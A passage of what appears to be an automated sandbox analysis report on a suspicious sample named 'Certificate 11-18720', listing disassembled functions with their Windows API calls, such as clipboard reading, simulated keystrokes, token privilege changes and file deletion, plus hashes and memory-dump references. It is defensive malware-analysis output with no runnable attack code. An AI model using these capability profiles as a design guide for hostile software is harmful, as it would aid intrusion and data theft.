                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                                    • String ID:
                                                                                    • API String ID: 1144279405-0
                                                                                    • Opcode ID: 0bee0abbd27c0e7d9ee677cef825d94886a879f75344ac187f49524be53fa905
                                                                                    • Instruction ID: 63286e7848f93368ece0b7f613b1a77a35f53955795e7ec21e3c8d78eaed5dfe
                                                                                    • Opcode Fuzzy Hash: 0bee0abbd27c0e7d9ee677cef825d94886a879f75344ac187f49524be53fa905
                                                                                    • Instruction Fuzzy Hash: 771190728046869BE71AAFA6980935A3E61BF81332F255740E4F41B1E3D7B4AD008BA1
                                                                                    Function 005C39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                    • Instruction ID: 460f66d31b04fadc2d17c46759d0c528101c9c25d6e4b2c3497843b7610c4e76
                                                                                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                    • Instruction Fuzzy Hash: C9016D3140010EAECB09EFA4C892DEEBF75FA20304F10806DB566961A5EA309A49CF60
                                                                                    Function 005E2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 005E2AED
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
                                                                                    • Opcode ID: 3f35b866c12464c2848c45cc3dd91b10c0f1a41b59264b7374d6d4f8ae89eaf1
                                                                                    • Instruction ID: 4d921d37657cab2a5ba96e617d184cace93951f5d47ebe671e128a03068c4903
                                                                                    • Opcode Fuzzy Hash: 3f35b866c12464c2848c45cc3dd91b10c0f1a41b59264b7374d6d4f8ae89eaf1
                                                                                    • Instruction Fuzzy Hash: 75F0C831500286DADF29AF668C0A39F3EAD7F80350F154425B4949B195CBB48951DB51
                                                                                    Function 005C4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,005C39FE,?,00000001), ref: 005C4286
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 6db6d393f8d983fe6c1acebfbab967b03bc42e46ce776c711c381b865d4c3262
                                                                                    • Instruction ID: b718f9363e85e9542c11ab07675484ba93635b63f274987bcc00213dede72749
                                                                                    • Opcode Fuzzy Hash: 6db6d393f8d983fe6c1acebfbab967b03bc42e46ce776c711c381b865d4c3262
                                                                                    • Instruction Fuzzy Hash: 37F01579505702CFCB349FA5D8A5D66BBF5BF043257248A2EF1D682610C7329844DF50
                                                                                    Function 005C40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005C40C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 82841172-0
                                                                                    • Opcode ID: acd9a433b02db2e49d96bef09798c00ad9fb1b173c98581f2eaa04e764dad174
                                                                                    • Instruction ID: 8b7567adac727d69c4795b02d92d646d739124e0033db34eb1a9eb49dff4f05f
                                                                                    • Opcode Fuzzy Hash: acd9a433b02db2e49d96bef09798c00ad9fb1b173c98581f2eaa04e764dad174
                                                                                    • Instruction Fuzzy Hash: EDE0CD37A001255BC7119654CC46FEA779DEFC8690F050075F905D7244DD74D9818690
                                                                                    Function 00F46288 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00F46299
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: bb702b62d8855687d6a5f0ac98ed8e3922fe3adb46f053ca83f5f439d409ea4c
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: BDE0E67494020DEFDB00DFB4D54969D7FB4EF04701F100161FD01D2280D6709E509A62

                                                                                    Non-executed Functions

                                                                                    Function 0062F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0062F87D
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062F8DC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0062F919
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0062F940
                                                                                    • SendMessageW.USER32 ref: 0062F966
                                                                                    • _wcsncpy.LIBCMT ref: 0062F9D2
                                                                                    • GetKeyState.USER32(00000011), ref: 0062F9F3
                                                                                    • GetKeyState.USER32(00000009), ref: 0062FA00
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062FA16
                                                                                    • GetKeyState.USER32(00000010), ref: 0062FA20
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0062FA4F
                                                                                    • SendMessageW.USER32 ref: 0062FA72
                                                                                    • SendMessageW.USER32(?,00001030,?,0062E059), ref: 0062FB6F
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0062FB85
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0062FB96
                                                                                    • SetCapture.USER32(?), ref: 0062FB9F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FC03
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0062FC0F
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0062FC29
                                                                                    • ReleaseCapture.USER32 ref: 0062FC34
                                                                                    • GetCursorPos.USER32(?), ref: 0062FC69
                                                                                    • ScreenToClient.USER32(?,?), ref: 0062FC76
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0062FCD8
                                                                                    • SendMessageW.USER32 ref: 0062FD02
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0062FD41
                                                                                    • SendMessageW.USER32 ref: 0062FD6C
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0062FD84
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0062FD8F
                                                                                    • GetCursorPos.USER32(?), ref: 0062FDB0
                                                                                    • ScreenToClient.USER32(?,?), ref: 0062FDBD
                                                                                    • GetParent.USER32(?), ref: 0062FDD9
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0062FE3F
                                                                                    • SendMessageW.USER32 ref: 0062FE6F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FEC5
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0062FEF1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0062FF19
                                                                                    • SendMessageW.USER32 ref: 0062FF3C
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FF86
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0062FFB6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063004B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 2516578528-4164748364
                                                                                    • Opcode ID: 257a817ab22dc6beb57762cd8652a82bd08633bae49397b6c39c748771cab3c8
                                                                                    • Instruction ID: 3ea1cf2f4fe9e7bae126c56ca087501b2e01e09a426901ef1fb98d14f088e834
                                                                                    • Opcode Fuzzy Hash: 257a817ab22dc6beb57762cd8652a82bd08633bae49397b6c39c748771cab3c8
                                                                                    • Instruction Fuzzy Hash: BC32CC78A04655EFDB10CF68D884BAABBBABF49344F140A39F5958B2A0D731DC41CF51
                                                                                    Function 0062AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0062B1CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    • Opcode ID: b1588ef53382b7a13459d70df7d9682499967dca3c06e1d80e9ad4d516c2755a
                                                                                    • Instruction ID: 75c65c4cf2d460c1b4546ec7fd4f8842a3a56297942b5849c165dc5c9f4d96bb
                                                                                    • Opcode Fuzzy Hash: b1588ef53382b7a13459d70df7d9682499967dca3c06e1d80e9ad4d516c2755a
                                                                                    • Instruction Fuzzy Hash: 8D12E171600629ABEB249FA4EC49FAE7BBAFF85710F104119F915DB2D1DBB08942CF11
                                                                                    Function 005DEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 005DEB4A
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00633AEA
                                                                                    • IsIconic.USER32(000000FF), ref: 00633AF3
                                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00633B00
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633B0A
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00633B20
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00633B27
                                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00633B33
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00633B44
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00633B4C
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00633B54
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633B57
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B6C
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B77
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B81
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B86
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B8F
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B94
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B9E
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633BA3
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633BA6
                                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00633BCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 084e9caa18ad2573f265bdd856aa6eab86736c087c341ff176d34624af739966
                                                                                    • Instruction ID: 9ffda9b48e0d6f50bb5a76a22655dc01b305a59f5dfdddafce60bb494b4bf0ad
                                                                                    • Opcode Fuzzy Hash: 084e9caa18ad2573f265bdd856aa6eab86736c087c341ff176d34624af739966
                                                                                    • Instruction Fuzzy Hash: 9031C775F40328BBEB202B659C49FBF7E6EEB45B50F114015FA05EA2D0DAB05D00ABA0
                                                                                    Function 005FACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                      • Part of subcall function 005FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                      • Part of subcall function 005FB134: GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    • _memset.LIBCMT ref: 005FAD08
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005FAD5A
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FAD6B
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005FAD82
                                                                                    • GetProcessWindowStation.USER32 ref: 005FAD9B
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 005FADA5
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005FADBF
                                                                                      • Part of subcall function 005FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005FACC0), ref: 005FAB99
                                                                                      • Part of subcall function 005FAB84: CloseHandle.KERNEL32(?,?,005FACC0), ref: 005FABAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $H*g$default$winsta0
                                                                                    • API String ID: 2063423040-11867929
                                                                                    • Opcode ID: 0897868406290253de619bae033c79897066c2a048b1dcd198b137872322f763
                                                                                    • Instruction ID: d20de987c6bf81767ba9bcb0937a4708e684adcee7c9507680dfeed79e3255fb
                                                                                    • Opcode Fuzzy Hash: 0897868406290253de619bae033c79897066c2a048b1dcd198b137872322f763
                                                                                    • Instruction Fuzzy Hash: 068156B580020DAFDF119FA4CC49ABEBFB9FF09304F044119FA18A6161D7398E549B62
                                                                                    Function 006060DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00605FA6,?), ref: 00606EF1
                                                                                      • Part of subcall function 0060725E: __wsplitpath.LIBCMT ref: 0060727B
                                                                                      • Part of subcall function 0060725E: __wsplitpath.LIBCMT ref: 0060728E
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • _wcscat.LIBCMT ref: 00606149
                                                                                    • _wcscat.LIBCMT ref: 00606167
                                                                                    • __wsplitpath.LIBCMT ref: 0060618E
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006061A4
                                                                                    • _wcscpy.LIBCMT ref: 00606209
                                                                                    • _wcscat.LIBCMT ref: 0060621C
                                                                                    • _wcscat.LIBCMT ref: 0060622F
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0060625D
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0060626E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00606289
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00606298
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 006062AD
                                                                                    • DeleteFileW.KERNEL32(?), ref: 006062BE
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006062E1
                                                                                    • FindClose.KERNEL32(00000000), ref: 006062FD
                                                                                    • FindClose.KERNEL32(00000000), ref: 0060630B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1917200108-1173974218
                                                                                    • Opcode ID: 04811758c509dec2b1ea82fbd018de9da50b253135b9c312d7b06af773bcf292
                                                                                    • Instruction ID: d35418a31cedbcb66eaefb1a1e6f8150076855ca331e37a953b7bfeead64c469
                                                                                    • Opcode Fuzzy Hash: 04811758c509dec2b1ea82fbd018de9da50b253135b9c312d7b06af773bcf292
                                                                                    • Instruction Fuzzy Hash: 68512072C4811C6ACB25EB91CC45DDBB7BDAF05300F0501EAF585E3181DE7697998FA4
                                                                                    Function 00616B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenClipboard.USER32(0065DC00), ref: 00616B36
                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00616B44
                                                                                    • GetClipboardData.USER32(0000000D), ref: 00616B4C
                                                                                    • CloseClipboard.USER32 ref: 00616B58
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00616B74
                                                                                    • CloseClipboard.USER32 ref: 00616B7E
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00616B93
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00616BA0
                                                                                    • GetClipboardData.USER32(00000001), ref: 00616BA8
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00616BB5
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00616BE9
                                                                                    • CloseClipboard.USER32 ref: 00616CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                    • String ID:
                                                                                    • API String ID: 3222323430-0
                                                                                    • Opcode ID: 8c4efa3dcc2d99929a4bac498c975f7f36536034517eb1259ef042efcd652a9e
                                                                                    • Instruction ID: 227c0b2da59f28da9c1361b116a499cb3f5527410dcc359c6100ec36dabf818b
                                                                                    • Opcode Fuzzy Hash: 8c4efa3dcc2d99929a4bac498c975f7f36536034517eb1259ef042efcd652a9e
                                                                                    • Instruction Fuzzy Hash: CC5191792042026FD300AFA4DD4AFAE7BAAAF85B00F05052DF696D62D1DF70D9458B62
                                                                                    Function 0060F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0060F62B
                                                                                    • FindClose.KERNEL32(00000000), ref: 0060F67F
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0060F6A4
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0060F6BB
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0060F6E2
                                                                                    • __swprintf.LIBCMT ref: 0060F72E
                                                                                    • __swprintf.LIBCMT ref: 0060F767
                                                                                    • __swprintf.LIBCMT ref: 0060F7BB
                                                                                      • Part of subcall function 005E172B: __woutput_l.LIBCMT ref: 005E1784
                                                                                    • __swprintf.LIBCMT ref: 0060F809
                                                                                    • __swprintf.LIBCMT ref: 0060F858
                                                                                    • __swprintf.LIBCMT ref: 0060F8A7
                                                                                    • __swprintf.LIBCMT ref: 0060F8F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
